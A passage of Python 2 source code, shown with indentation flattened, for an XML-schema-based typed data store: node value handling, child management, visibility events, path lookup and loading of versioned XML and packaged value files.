if 'beforeVisibilityChange' not in self.eventhandlers: return
if self.blockNotifyOfHiddenNodes and self.getParent(node).isHidden(): return
if self.blockNotifyOfHiddenNodes and (not showhide) and node.isHidden(): return
if self.isGrouper(node):
children = self.getChildren(node)
if len(children)==0: return
self.eventhandlers['beforeVisibilityChange'](children,shownew,showhide)
else:
self.eventhandlers['beforeVisibilityChange']((node,),shownew,showhide)
def afterVisibilityChange(self,node,shownew,showhide):
assert isinstance(node,Node), 'Supplied object is not of type "Node" (but "%s").' % node
assert node.isValid(), 'Supplied node %s is invalid (has already been destroyed).' % node
assert node==self.upcomingvizchange, 'The node supplied to afterVisibilityChange (%s) was not the last one supplied to beforeVisibilityChange (%s).' % (node,self.upcomingvizchange)
#print 'afterVisibilityChange'
self.upcomingvizchange = None
if 'afterVisibilityChange' not in self.eventhandlers: return
if self.blockNotifyOfHiddenNodes and self.getParent(node).isHidden(): return
if self.blockNotifyOfHiddenNodes and (not showhide) and node.isHidden(): return
if self.isGrouper(node):
children = self.getChildren(node)
if len(children)==0: return
self.eventhandlers['afterVisibilityChange'](children,shownew,showhide)
else:
self.eventhandlers['afterVisibilityChange']((node,),shownew,showhide)
def afterStoreChange(self):
#print 'afterStoreChange'
if 'afterStoreChange' not in self.eventhandlers: return
self.eventhandlers['afterStoreChange']()
def onBeforeChange(self,node,newvalue):
assert isinstance(node,Node), 'Supplied object is not of type "Node" (but "%s").' % node
assert node.isValid(), 'Supplied node %s is invalid (has already been destroyed).' % node
#print 'onBeforeChange'
if 'beforeChange' not in self.eventhandlers: return True
if node.isHidden() and self.blockNotifyOfHiddenNodes: return True
return self.eventhandlers['beforeChange'](node,newvalue)
def onChange(self,node,feature):
assert isinstance(node,Node), 'Supplied object is not of type "Node" (but "%s").' % node
assert node.isValid(), 'Supplied node %s is invalid (has already been destroyed).' % node
#print 'onChange'
if 'afterChange' not in self.eventhandlers: return
if node.isHidden() and self.blockNotifyOfHiddenNodes: return
self.eventhandlers['afterChange'](node,feature)
def onDefaultChange(self,node,feature):
assert isinstance(node,Node), 'Supplied object is not of type "Node" (but "%s").' % node
assert node.isValid(), 'Supplied node %s is invalid (has already been destroyed).' % node
#print 'onDefaultChange'
if self.processDefaultChange==1 or (self.processDefaultChange==0 and not node.hasValue()):
self.onChange(node,feature)
class Node(object):
def __init__(self,controller,templatenode,valuenode,location,parent):
assert templatenode.hasAttribute('name'),'Schema node %s lacks "name" attribute.' % location
self.controller = controller
self.templatenode = templatenode
self.valueroot = valuenode
self.valuenode = valuenode
self.location = tuple(location)
self.parent = parent
self.children = []
self.futureindex = None
self.visible = self.templatenode.getAttribute('hidden')!='True'
self.grouponly = frozenset(self.templatenode.getAttribute('grouponly').split(';'))
# Build a dictionary with all child value nodes
valuechildren = {}
if self.valueroot is not None:
for ch in self.valueroot.childNodes:
if ch.nodeType==ch.ELEMENT_NODE:
valuechildren.setdefault(ch.localName,[]).append(ch)
canhavechildren = False
for templatechild in self.templatenode.childNodes:
if templatechild.nodeType==templatechild.ELEMENT_NODE and templatechild.localName=='element':
childid = templatechild.getAttribute('name')
canhavechildren = True
# Get all value nodes that correspond to the current template child.
childloc = list(self.location) + [childid]
curvaluechildren = valuechildren.pop(childid,[])
# Check minimum and maximum occurrences of the node.
minoccurs = templatechild.getAttribute('minOccurs')
if minoccurs=='': minoccurs = 1
maxoccurs = templatechild.getAttribute('maxOccurs')
if maxoccurs=='': maxoccurs = 1
minoccurs = int(minoccurs)
if maxoccurs!='unbounded': maxoccurs = int(maxoccurs)
assert maxoccurs==1 or minoccurs==0,'Node %s: for maxOccurs %s > 1, minOccurs must currently equal 0, but it is %i.' % (','.join(childloc),maxoccurs,minoccurs)
assert maxoccurs=='unbounded' or maxoccurs>=minoccurs, 'Node %s: the value of the "maxOccurs" (%i) attribute must be greater than or equal to that of "minOccurs" (%i).' % (','.join(childloc),maxoccurs,minoccurs)
if maxoccurs!='unbounded' and len(curvaluechildren)>maxoccurs:
print 'Node "%s": number of children (%i) is greater than the imposed maximum (%i). Redundant child nodes will be deleted.' % (','.join(childloc),len(curvaluechildren),maxoccurs)
for vch in curvaluechildren[maxoccurs:]: self.valueroot.removeChild(vch)
for i in range(len(curvaluechildren),minoccurs):
curvaluechildren.append(None)
# Create nodes for all value nodes found.
for valuechild in curvaluechildren:
self.children.append(Node(self.controller,templatechild,valuechild,childloc,parent=self))
# For nodes that can have children as well as a value, the value is stored in a
# child node. This child node carries the same name as the parent.
if canhavechildren and self.canHaveValue():
curvaluechildren = valuechildren.pop(self.location[-1],(None,))
assert len(curvaluechildren)<=1, 'Value node (%s) can at most occur 1 time below %s, but it occurs %i times.' % (self.location[-1],self.location,len(curvaluechildren))
self.valuenode = curvaluechildren[0]
# Check for existing value nodes that are not in the template.
for childid,childnodes in valuechildren.iteritems():
# If this data type builds its own XML structure to store its data, it may
# use child nodes, so do not complain about the children we do not know about.
if not isinstance(self.getValueType(returnclass=True),datatypes.DataTypeSimple): break
print 'WARNING! Value "%s" below "%s" was unexpected and will be ignored.' % (childid,self.location)
for ch in childnodes: self.valueroot.removeChild(ch)
def __str__(self):
"""Returns a string representation of the node.
"""
return str(self.location)
def destroy(self):
"""Deallocates all variables of the node, breaking circular
references.
"""
for ch in self.children:
if ch is not None: ch.destroy()
self.location = ()
self.children = []
self.parent = None
self.templatenode = None
self.valueroot = None
self.valuenode = None
self.controller = None
def isValid(self):
"""Determines whether the node is valid. Returns False only if
"destroy" has been called.
"""
return self.controller is not None
def getValue(self,usedefault=False):
"""Returns the typed value of the node. This function returns
None if the node does not have a value yet, and throws an error
if the node cannot have a value (i.e., it is a container only).
"""
value = None
if self.valuenode is not None:
valuetype = self.getValueType(returnclass=True)
try:
value = valuetype.load(self.valuenode,self.controller.context,self.templatenode)
except ValueError,e:
raise ValueError('%s: %s' % ('/'.join(self.location),e))
if value is None and usedefault: value = self.getDefaultValue()
return value
def hasValue(self):
if self.valuenode is None: return False
value = self.getValue()
if value is None: return False
if isinstance(value,util.referencedobject): value.release()
return True
def getDefaultValue(self):
"""Returns the default value of the node. This function returns
None if no default value if available, which applies also if
a default store has not been specified.
"""
defaultstore = self.controller.defaultstore
if defaultstore is None: return None
defaultnode = defaultstore.mapForeignNode(self)
if defaultnode is None: return None
return defaultnode.getValue(usedefault=True)
def hasDefaultValue(self):
value = self.getValue()
if value is None: return True
defvalue = self.getDefaultValue()
hasdef = value==defvalue
if isinstance(value, util.referencedobject): value.release()
if isinstance(defvalue,util.referencedobject): defvalue.release()
return hasdef
def setValue(self,value):
"""Sets the typed value of the node. Returns True if the value
of the node was changed, False if it was not changed. Changes
may be prevented by an attached interface disallowing the change.
"""
if value is None:
self.clearValue()
return
curval = self.getValue()
changed = False
if curval!=value:
if self.controller.onBeforeChange(self,value):
valuetype = self.getValueType(returnclass=True)
if not isinstance(value,valuetype): value = valuetype(value)
if self.valuenode is None: self.createValueNode()
changed = value.save(self.valuenode,self.controller.context)
self.controller.onChange(self,'value')
if isinstance(curval,util.referencedobject): curval.release()
return changed
def clearValue(self,recursive=False,skipreadonly=False,deleteclones=True):
"""Clears the value of the node.
If recursive=True, also clears the value of the descendant nodes; if
additionally deleteclones=True, all optional descendant nodes are
deleted completely.
If skipreadonly is True, the read-only status of nodes if
respected, implying that their value is not cleared if they have
the read-only attribute.
"""
# First clear children.
cleared = True
if recursive:
if deleteclones: self.removeAllChildren(optionalonly=True)
for ch in self.children:
if not ch.clearValue(recursive=True,skipreadonly=skipreadonly,deleteclones=deleteclones):
cleared = False
# Do not clear if (1) it is already cleared (result: success), (2) it is
# read-only and the user wants to respect that (result: failure),
# (3) it is the root node (result: failure), or (4) clearing the child nodes failed.
if self.valuenode is None: return True
if (skipreadonly and self.isReadOnly()) or self.parent is None or not cleared: return False
# Clear if (1) this node can have no value - it must occur, and (2) the attached interfaces approve.
if (not self.canHaveClones()) and self.controller.onBeforeChange(self,None):
self.valuenode.parentNode.removeChild(self.valuenode)
if (self.valueroot==self.valuenode): self.valueroot = None
self.valuenode = None
self.controller.onChange(self,'value')
return True
else:
return False
def getValueAsString(self,addunit = True,usedefault = False):
"""Returns a user-readable string representation of the value of the node.
"""
# Get the value - return an empty string if no value is set.
value = self.getValue(usedefault=usedefault)
if value is None: return ''
# Get the XML template node describing the data type, and the Python class representing the type.
templatenode = self.templatenode
valuetype = self.getValueType(returnclass=True)
# Initially we do not have a string representation
strvalue = None
# First look if the value was chosen from a list of predefined options.
if templatenode.hasAttribute('hasoptions'):
# Get label of currently selected option
optionsroot = util.findDescendantNode(templatenode,['options'])
for ch in optionsroot.childNodes:
if ch.nodeType==ch.ELEMENT_NODE and ch.localName=='option':
chvalue = valuetype.fromXmlString(ch.getAttribute('value'),{},templatenode)
if value==chvalue:
# We found the currently selected option; its label will serve as displayed value.
if ch.hasAttribute('label'):
strvalue = ch.getAttribute('label')
else:
strvalue = ch.getAttribute('value')
break
# If we do not have a string representation yet, then let the value itself out the best pretty string.
if strvalue is None: strvalue = value.toPrettyString()
# Release the reference to the value if needed.
if isinstance(value,util.referencedobject): value.release()
# Append unit specifier (if available)
if addunit:
unit = self.getUnit()
if unit is not None: strvalue += ' ' + unit
return strvalue
def addChild(self,childname,position=None,id=None):
"""Adds a new child node; this child node must be optional as
defined in the template with minOccurs/maxOccurs attributes.
The new child node is by default appended to the list of existing
nodes with the same name, or inserted at the specified "position".
"""
index = -1
templatenode = None
# First see of already one instance of this child is in the tree; that makes finding the position easy.
existingcount = 0
for curindex,child in enumerate(self.children):
if child.location[-1]==childname:
assert id is None or child.getSecondaryId()!=id, 'Child node with the id "%s" already exists below %s.' % (id,str(self.location))
index = curindex
templatenode = child.templatenode
existingcount += 1
elif index!=-1:
# We are at the end of the list of nodes with the specified name. Stop.
break
# If no insert position was specified, append at the end
if position is None: position = existingcount
if index!=-1:
# Found an existing node with this name
assert position>=0, 'Position must be positive, but is %i. Use position=None to append to the end.' % position
assert position<=existingcount, 'Cannot insert child "%s" at position %i, because only %i nodes exist so far.' % (childname,position,existingcount)
index = index+1-existingcount+position
else:
# Node with this name not yet in tree.
assert position==0, 'Cannot insert child "%s" at position %i, because no node wih this name exists so far.' % (childname,position)
# Enumerate over all template children of the parent we want to insert below.
# Store a list of names of children that precede the node to be inserted.
predecessors = []
for templatenode in self.templatenode.childNodes:
if templatenode.nodeType==templatenode.ELEMENT_NODE and templatenode.localName=='element':
childid = templatenode.getAttribute('name')
if childid==childname: break
predecessors.append(childid)
else:
# Could not find the specified child in the template.
return None
# Enumerate over all actual children until we reach the point where the child should be inserted.
index = 0
for child in self.children:
curname = child.location[-1]
while len(predecessors)>0 and curname!=predecessors[0]:
predecessors.pop(0)
if len(predecessors)==0: break
index += 1
# Ensure the parent to insert below has a value node
# (we need to insert the value node below it to give the child life)
self.createValueNode(rootonly=True)
# Find the XML document
doc = self.valueroot
while doc.parentNode is not None: doc=doc.parentNode
assert doc.nodeType==doc.DOCUMENT_NODE, 'Could not find DOM document node. Node "%s" does not have a parent.' % doc.tagName
# Create the value node for the current child
node = doc.createElementNS(self.valueroot.namespaceURI,childname)
if id is not None: node.setAttribute('id',id)
# Insert the value node
if position>=existingcount:
valueroot = self.valueroot.appendChild(node)
else:
valueroot = self.valueroot.insertBefore(node,self.children[index].valueroot)
# Create the child (template + value)
child = Node(self.controller,templatenode,valueroot,list(self.location)+[childname],parent=self)
assert child.canHaveClones(), 'Cannot add another child "%s" because there can exist only one child with this name.' % childname
# Set the node visibility before notifying anyone of its presence.
# For this to work under all circumstances, we need to [temporarily] add the new child.
self.children.insert(index,child)
child.updateVisibility(recursive=True,notify=False)
self.children.pop(index)
# Insert the child, and notify attached interfaces.
child.futureindex = index
self.controller.beforeVisibilityChange(child,True,False)
self.children.insert(index,child)
self.controller.afterVisibilityChange(child,True,False)
child.futureindex = None
# Return the newly inserted child.
return child
def createValueNode(self,rootonly=False):
"""Creates the (empty) value node, and creates value nodes for
all ancestors that lacks a value node as well.
"""
if self.valuenode is not None or (rootonly and self.valueroot is not None): return
assert rootonly or self.canHaveValue(),'Asked to create value node for %s, but this node cannot have a value.' % (str(self.location),)
# Build a list of all ancestors that do not have a value root yet.
parents = []
root = self
while root.valueroot is None:
parents.insert(0,root)
root = root.parent
valueroot = root.valueroot
# Find the XML document for values.
doc = valueroot
while doc.parentNode is not None: doc=doc.parentNode
assert doc.nodeType==doc.DOCUMENT_NODE, 'Could not find DOM document node needed to create %s. Node "%s" does not have a parent.' % (location,doc.tagName)
# Create value roots for all ancestors that lack one.
for par in parents:
par.valueroot = doc.createElementNS(valueroot.namespaceURI,par.getId())
valueroot.appendChild(par.valueroot)
valueroot = par.valueroot
if self.canHaveValue() and self.canHaveChildren():
# This node can have a value as well as children, and therefore needs a
# separate value node.
if rootonly: return
self.valuenode = doc.createElementNS(self.valueroot.namespaceURI,self.getId())
self.valueroot.appendChild(self.valuenode)
else:
# This node uses the value root for storing its value.
self.valuenode = self.valueroot
import xml.dom
assert isinstance(self.valueroot,xml.dom.Node),'Value root is not of type xml.dom.Node. Value = %s' % (str(self.valueroot),)
assert isinstance(self.valuenode,xml.dom.Node),'Value node is not of type xml.dom.Node. Value = %s' % (str(self.valuenode),)
def getChildById(self,childname,id,create=False):
"""Gets an optional node (typically a node that can occur more than once)
by its identifier. If the it does not exist yet, and create is True,
the requested node is created (and intermediate nodes as well).
"""
for child in self.children:
if child.location[-1]==childname and child.getSecondaryId()==id:
break
else:
if not create: return None
child = self.addChild(childname,id=id)
return child
def getChildByNumber(self,childname,index,create=False):
"""Gets an optional node (typically a node that can occur more than once)
by its number. If the it does not exist yet, and create is True,
the requested node is created (and intermediate nodes as well).
"""
curindex = 0
for child in self.children:
if child.location[-1]==childname:
if curindex==index: break
curindex += 1
else:
if not create: return None
for ichild in range(index-curindex+1):
child = self.addChild(childname)
return child
def removeChild(self,childname,id):
"""Removes an optional child node with the specified name and
id. An id can either be the number (int) of the child node in the list
with children of that name, or the id (string) set in its "id"
child node.
"""
assert isinstance(id,int) or isinstance(id,basestring), 'Specified id must be an integer or a string.'
if isinstance(id,int):
return self.removeChildren(childname,id,id)
else:
for child in reversed(self.children):
if child.location[-1]==childname and child.getSecondaryId()==id:
self.removeChildNode(child)
break
else:
assert False, 'Cannot find child "%s" with id "%s".' % (childname,id)
def removeChildren(self,childname,first=0,last=None):
"""Removes a (range of) optional child nodes with the specified name.
If the last number to remove is not specified, nodes will be removed
till the end.
"""
ipos = 0
ichildpos = -1
while ipos<len(self.children):
child = self.children[ipos]
if child.location[-1]==childname:
assert child.canHaveClones(),'Cannot remove child "%s" because it must occur exactly one time.' % childname
ichildpos += 1
if last is not None and ichildpos>last: return
if ichildpos>=first:
self.removeChildNode(child,ipos)
ipos -= 1
ipos += 1
def removeAllChildren(self,optionalonly=True):
"""Removes all optional child nodes. The "optionalonly" argument
is used internally only to remove every single descendant
of an optional node.
"""
for ipos in range(len(self.children)-1,-1,-1):
child = self.children[ipos]
if (not optionalonly) or child.canHaveClones():
self.removeChildNode(child,ipos)
def removeChildNode(self,node,pos=None):
if pos is None: pos = self.children.index(node)
node.removeAllChildren(optionalonly=False)
self.controller.beforeVisibilityChange(node,False,False)
self.children.pop(pos)
if node.valueroot is not None:
assert self.valueroot is not None,'Child has a value root but the parent does not.'
self.valueroot.removeChild(node.valueroot)
node.valueroot = None
node.valuenode = None
self.controller.afterVisibilityChange(node,False,False)
node.destroy()
def getId(self):
"""Returns the id of the node.
"""
return self.location[-1]
def getSecondaryId(self):
"""Returns the secondary id of the node. This is only present for
nodes that can occur multiple times, and must then be set on creation
of the node. Returns an empty string if the secondary id has not been set.
"""
assert self.valueroot is not None, 'The value node has not been set; this node cannot be optional.'
return self.valueroot.getAttribute('id')
def getValueType(self,returnclass=False):
"""Returns the value type of the node; an empty string is returned
if the node cannot have a value.
"""
valuetype = self.templatenode.getAttribute('type')
if returnclass:
if valuetype=='': return None
valuetype = self.controller.getDataType(valuetype)
return valuetype
def getUnit(self):
"""Returns the unit of the node; None is returned if the node
does not have a unit specified.
"""
unit = self.templatenode.getAttribute('unit')
if unit in ('','-'):
unit = None
elif unit[0]=='[' and unit[-1]==']':
node = self.parent[unit[1:-1]]
if node is None: return None
unit = node.getValueAsString(addunit=False,usedefault=True)
return unit
def getText(self,detail,minimumdetail = 0,capitalize=False):
"""Returns a (template) text describing the node. Depending
on the "detail" argument, this returns the node id (detail=0),
the node label (detail=1), or the node description (detail=2).
If the text within the specified detail is unavailable, text
with lower detail is looked for down to level "minimumdetail".
If no text is found that meets the criteria, None is returned.
If "capitalize" is True, the first letter of the returned text
is capitalized.
"""
templatenode = self.templatenode
ret = None
if self.canHaveClones():
ret = self.getSecondaryId()
if ret=='': ret = None
if ret is None:
if detail==2 and templatenode.hasAttribute('description'):
ret = templatenode.getAttribute('description')
elif detail>=1 and minimumdetail<=1 and templatenode.hasAttribute('label'):
ret = templatenode.getAttribute('label')
elif minimumdetail==0:
ret = self.getId()
if ret is not None and capitalize: ret = ret[0].upper() + ret[1:]
return ret
def __getitem__(self,path):
assert isinstance(path,basestring), 'Supplied node path is not a string: %s.' % path
return self.getLocation(path.split('/'))
def getLocation(self,location,createoptional=False):
"""Returns the child node at the specified location (a list of
path components - strings).
"""
node = self
for childname in location:
# Read secondary id between square brackets [if any]
secid = None
if childname.endswith(']') and '[' in childname:
istart = childname.rfind('[')
secid = childname[istart+1:-1]
childname = childname[:istart]
if secid.startswith('\'') and secid.endswith('\''):
secid = secid[1:-1]
elif secid.isdigit():
secid = int(secid)
if childname=='..':
# Move one level up
assert self.parent is not None,'Cannot go up one level because we are at the root.'
node = node.parent
elif childname!='' and childname!='.':
# Try to find the requested child node.
ich = 0
for chnode in node.children:
if chnode.location[-1]==childname:
if secid is None or (isinstance(secid,int) and secid==ich) or (isinstance(secid,basestring) and secid==chnode.getSecondaryId()):
node = chnode
break
ich += 1
else:
# Child was not found, but if it is optional it can be created on request.
if createoptional and secid is not None:
if isinstance(secid,basestring):
node = node.addChild(childname,id=secid)
else:
node = node.getChildByNumber(childname,secid,create=True)
if node is None: return None
else:
return None
return node
def getLocationMultiple(self,location):
"""Returns all child nodes at the specified location (a list of
path components - strings).
"""
# Get the first non-empty path term.
path = location[:]
target = ''
while target=='' and len(path)>0: target = path.pop(0)
if target=='': return [self]
res = []
for child in self.children:
if child.location[-1]==target:
if len(path)==0:
res.append(child)
else:
res += child.getLocationMultiple(path)
return res
def isHidden(self):
"""Returns True is the node is currently hidden. Nodes can be hidden
because the template conditions on their visibility are not met,
or because they simply have the "hidden" attribute set in the template.
"""
node = self
while node is not None:
if not node.visible: return True
node = node.parent
return False
def isReadOnly(self):
"""Returns True if the template specifies the read-only attribute
for the node.
Note that settings the read-only attribute does not prevent any
modification of the node value through the API; it is merely a
sign the UI editors not to allow editing of the node.
"""
return self.templatenode.hasAttribute('readonly')
def hasChildren(self):
"""Returns True if the node has children.
"""
return len(self.children)>0
def canHaveValue(self):
"""Returns True if the node can have a value, False if not
(e.g. when the node is a container only).
"""
return self.templatenode.hasAttribute('type')
def canHaveChildren(self):
if len(self.children)>0: return True
for templatechild in self.templatenode.childNodes:
if templatechild.nodeType==templatechild.ELEMENT_NODE and templatechild.localName=='element': return True
return False
def canHaveClones(self):
"""Returns True if the node can occurs more than once.
"""
return self.templatenode.getAttribute('maxOccurs') not in ('','1')
def getDescendants(self):
"""Returns all descendant nodes.
"""
res = [self]
for ch in self.children:
res += ch.getDescendants()
return res
def getNodesByType(self,valuetype,allowderived=False):
"""Returns all descendant nodes with the specified data type.
"""
res = []
owntype = self.getValueType(returnclass=True)
if isinstance(valuetype,basestring): valuetype = self.controller.getDataType(valuetype)
if (allowderived and owntype is not None and issubclass(owntype,valuetype)) or owntype==valuetype:
res.append(self)
for ch in self.children:
res += ch.getNodesByType(valuetype,allowderived)
return res
def getEmptyNodes(self,usedefault=False):
"""Returns all descendant nodes that do not have a value assigned
to them, but are capable of having a value.
"""
res = []
if self.canHaveValue():
value = self.getValue(usedefault=usedefault)
if value is None: res.append(self)
if isinstance(value,util.referencedobject): value.release()
for ch in self.children:
res += ch.getEmptyNodes()
return res
def updateVisibility(self,recursive=False,notify=True):
"""Updates the dynamic visibility of the node by re-evaluating
the conditions imposed by the template on the node's visibility.
"""
templatenode = self.templatenode
cond = util.findDescendantNode(templatenode,['condition'])
if cond is not None:
shownew = self.controller.checkCondition(cond,self)
if shownew!=self.visible:
if notify: self.controller.beforeVisibilityChange(self,shownew)
self.visible = shownew
if notify: self.controller.afterVisibilityChange(self,shownew)
if recursive:
for child in self.children: child.updateVisibility(recursive=True,notify=notify)
def copyFrom(self,sourcenode,replace=replaceAlways,matchednodes=None):
"""Recursively copies the value of the current node from the
specified source node.
By default, any values of the target node and its children will be
overwritten with values from the source node. If this is not desired,
the replace argument can be used to control replacement of values in
detail.
If the matchednodes argument is provided, it must be a dictionary.
On return, it will contain the target nodes (keys) that have received
a value from a source node (values).
"""
if matchednodes is not None: matchednodes[self] = sourcenode
# Copy node value (if both source and target can have a value)
if self.canHaveValue() and sourcenode.canHaveValue():
if replace&replaceExistingValues or not self.hasValue():
curval = sourcenode.getValue()
if replace&replaceWithEmpty or curval is not None: self.setValue(curval)
if isinstance(curval,util.referencedobject): curval.release()
# If replacing previous contents, remove optional nodes (with minoccurs=0)
prevchildname = None
index = 0
oldchildren = list(self.children)
for sourcechild in sourcenode.children:
childname = sourcechild.location[-1]
# Update the index of this particular child (among others with the same name)
if childname!=prevchildname:
index = 0
prevchildname = childname
# For the found source node, locate the corresponding node in our own store.
# For optional nodes, the corresponding node is created if it did not exist yet.
if sourcechild.canHaveClones():
secid = sourcechild.getSecondaryId()
if secid!='':
child = self.getChildById(childname,secid,create=True)
else:
child = self.getChildByNumber(childname,index,create=True)
else:
child = self[childname]
# If we do not have this node, ignore it and continue with the next source node.
if child is None: continue
# Copy data from the source node.
child.copyFrom(sourcechild,replace=replace,matchednodes=matchednodes)
# If this child existed previously, remove it from the list of "orphans"
# (those nodes that were not present in the source node)
if child in oldchildren:
oldchildren.remove(child)
index += 1
if replace&replaceRemoveOldChildren:
# Remove all optional child nodes that were not matched by a child of the source node.
for ch in oldchildren:
if ch.canHaveClones(): self.removeChildNode(ch)
# ------------------------------------------------------------------------------------------
# TypedStore
# ------------------------------------------------------------------------------------------
def createStoreClass(name,schemainfodir):
return type(name,(TypedStore,),{'schemainfodir':schemainfodir})
# TypedStore: encapsulates the above store.
# Adds the use of a second XML document (template) that describes the data types
# of the nodes of the first DOM, and that describes dependencies between nodes.
# Any node in the original document for which conditions are not met is hidden.
# Nodes that are not described by the template are not allowed in the property store.
# Node are obtained by traversing the tree (start: TypedStore.root).
class TypedStore(util.referencedobject):
schemainfodir = None
version2defaultstore = None
@classmethod
def getSchemaInfo(cls):
"""Returns a SchemaInfo object that contains information on available schemas, converters, etc.
This method may be overridden by deriving classes if they want to make pre-made schemas,
converters and such available.
"""
if cls.schemainfodir is not None: return schemainfocache[cls.schemainfodir]
return SchemaInfo()
@classmethod
def getDefault(cls,version):
"""Returns a TypedStore with the set of default value identified by
the specified name, converted to the specified version if needed.
To use this, the deriving class MUST implement getSchemaInfo!
"""
import atexit
if cls==TypedStore: return None
if cls.version2defaultstore is None: cls.version2defaultstore = {}
# If we have defaults for the requested version in our cache, return these.
if version in cls.version2defaultstore: return cls.version2defaultstore[version]
# Function for filling in default values for linked-in templates.
def addDefaultsForLinks(store):
for node in store.root.getDescendants():
if node.templatenode.hasAttribute('sourcepath') and node.templatenode.getAttribute('version') and node.valueroot is None:
# The template for this node was linked in, and we do not have any default values for it yet.
srcdir = os.path.dirname(node.templatenode.getAttribute('sourcepath'))
subcls = createStoreClass('dummy',srcdir)
defs = subcls.getDefault(node.templatenode.getAttribute('version'))
if defs is not None: node.copyFrom(defs.root)
# Get a dictionary linking versions to paths for default values.
version2path = cls.getSchemaInfo().getDefaults()
# If no defaults are available, return None.
if not version2path: return None
# Select the file with defaults to load.
if version in version2path:
# Default values are present for the requested version; use these.
path = version2path[version]
else:
# No default values present for the requested version.
# Use the first values available - we will attempt conversion to the desired version.
path = version2path.values()[0]
# Load the selected defaults from file.
sourcestore = cls.fromXmlFile(path,adddefault=False)
addDefaultsForLinks(sourcestore)
atexit.register(TypedStore.release,sourcestore)
cls.version2defaultstore[sourcestore.version] = sourcestore
# If the loaded defaults already have the right version, return them.
if sourcestore.version==version: return sourcestore
# Loaded defaults have the wrong version. Attempt conversion to desired version.
defstore = cls.fromSchemaName(version,adddefault=False)
sourcestore.convert(defstore,usedefaults=False)
addDefaultsForLinks(defstore)
atexit.register(TypedStore.release,defstore)
cls.version2defaultstore[version] = defstore
return defstore
@classmethod
def fromSchemaName(cls,schemaname,*args,**kwargs):
"""Returns a TypedStore based on the schema identified by the specified
name.
To use this, the deriving class MUST implement getSchemaInfo!
"""
assert cls!=TypedStore, 'fromSchemaName cannot be called on base class "TypedStore", only on derived classes. You need to create a derived class with versioning support.'
schemapath = cls.getSchemaInfo().getSchemas().get(schemaname,None)
if schemapath is None:
raise Exception('Unable to locate XML schema file for "%s". Available: %s' % (schemaname,', '.join(cls.getSchemaInfo().getSchemas().keys())))
kwargs['schema'] = schemapath
store = cls(*args,**kwargs)
return store
@classmethod
def fromXmlFile(cls,path,targetstore=None,**kwargs):
"""Returns a TypedStore for the values at the specified path (XML file).
The values file is openend, its version identifier retrieved. Then the
program attempt to created the required schema. For this to work,
the deriving class must implement getSchemaInfo.
Additional named arguments are passes to the constructor (__init__)
of the data store class.
"""
container = None
if isinstance(path,datatypes.DataFile):
# XML file is provided as DataFile object.
f = path.getAsReadOnlyFile()
try:
valuedom = xml.dom.minidom.parse(f)
except Exception,e:
raise Exception('Unable to parse as XML: '+unicode(e))
f.close()
else:
# XML file is provided as a path.
if not os.path.isfile(path):
raise Exception('Specified path "%s" does not exist, or is not a file.' % path)
try:
valuedom = xml.dom.minidom.parse(path)
except Exception,e:
raise Exception('"%s" does not contain valid XML: %s' % (path,unicode(e)))
container = datatypes.DataContainerDirectory(os.path.dirname(os.path.abspath(path)))
# Get version of the XML file.
version = valuedom.documentElement.getAttribute('version')
# If no target store was provided, create one for the version of the XML file.
if targetstore is None: targetstore = cls.fromSchemaName(version,**kwargs)
# Make sure the names of the root element match in schema and values file.
schemarootname = targetstore.schema.getRoot().getAttribute('name')
if valuedom.documentElement.localName!=schemarootname:
raise Exception('Name of XML root node (%s) does not match root identifier in schema specification (%s).' % (valuedom.documentElement.localName,schemarootname))
if targetstore.version!=version and version!='':
# The version of the loaded values does not match the version of the target store; convert it.
if util.verbose: print 'Value file "%s" has version "%s"; starting conversion to "%s".' % (path,version,targetstore.version)
tempstore = cls.fromSchemaName(version)
tempstore.setStore(valuedom)
if container is not None:
tempstore.setContainer(container)
container.release()
tempstore.convert(targetstore)
tempstore.release()
targetstore.originalversion = version
else:
# Versions of target store and values file match; supply the values to the store.
targetstore.setStore(valuedom)
if container is not None:
targetstore.setContainer(container)
container.release()
return targetstore
@classmethod
def fromContainer(cls,path,callback=None,targetstore=None,**kwargs):
"""Loads values plus associated data from the specified path. The path should point
to a valid data container, i.e., a ZIP file, TAR/GZ file, or a directory. The source
container typically has been saved through the "saveAll" method.
Additional named arguments are passes to the constructor (__init__)
of the data store class.
"""
if isinstance(path,basestring):
# Container is provided as a string [path name]
container = datatypes.DataContainer.fromPath(path)
elif isinstance(path,datatypes.DataContainer):
# Container is provided as DataContainer object.
container = path.addref()
elif isinstance(path,datatypes.DataFile):
# Container is provided as a DataFile (an object in another container)
# In this case, the DataFile must be a ZIP file.
container = datatypes.DataContainerZip(path)
else:
assert False,'Supplied source must be a path, a data container object or a data file object.'
# Get list of files in source container.
files = container.listFiles()
# Get a descriptive name for the package, to be used in diagnostic and error messages.
packagetitle = getattr(cls,'packagetitle','packaged XLM store')
# Check for existence of XML values file.
storefilenames = cls.getSchemaInfo().getPackagedValuesNames()
for storefilename in storefilenames:
if storefilename in files: break
else:
storefilenames = ['"%s"' % n for n in storefilenames]
strstorefilenames = storefilenames[-1]
if len(storefilenames)>1: strstorefilenames = '%s or %s' % (', '.join(storefilenames[:-1]),strstorefilenames)
raise Exception('The specified source does not contain %s and can therefore not be a %s.' % (strstorefilenames,packagetitle))
# Report that we are beginning to load.
if callback is not None: callback(0.,'parsing XML')
# Read and parse the XML values file.
datafile = container.getItem(storefilename)
f = datafile.getAsReadOnlyFile()
storedom = xml.dom.minidom.parse(f)
f.close()
datafile.release()
# Get the version of the values file.
version = storedom.documentElement.getAttribute('version')
# If no target store was provided, create one for the version of the XML values file.
if targetstore is None: targetstore = cls.fromSchemaName(version,**kwargs)
if targetstore.version!=version and version!='':
# The version of the values file does not match the version of the target store; convert the values.
if util.verbose: print '%s "%s" has version "%s"; starting conversion to "%s".' % (packagetitle,path,version,targetstore.version)
if callback is not None: callback(0.5,'converting scenario')
tempstore = cls.fromSchemaName(version)
tempstore.loadAll(container)
if callback is None:
tempstore.convert(targetstore)
else:
tempstore.convert(targetstore,callback=lambda p,s: callback(.5+.5*p,'converting scenario: '+s))
tempstore.release()
targetstore.originalversion = version
else:
# Versions of values file and target store match; supply values to the store.
reqstorefilename = targetstore.schema.getRoot().getAttribute('packagedvaluesname')
if reqstorefilename=='': reqstorefilename = 'values.xml'
assert storefilename==reqstorefilename,'Schema-specified name for values file (%s) does not match found the values file found in the package (%s).' % (reqstorefilename,storefilename)
targetstore.setStore(storedom)
targetstore.setContainer(container)
# Store source path.
targetstore.path = container.path
# Release reference to container.
container.release()
# Report that we have finished loading.
if callback is not None: callback(1.,'done')
return targetstore
def __init__(self,schema,valueroot=None,otherstores={},adddefault=True):
util.referencedobject.__init__(self)
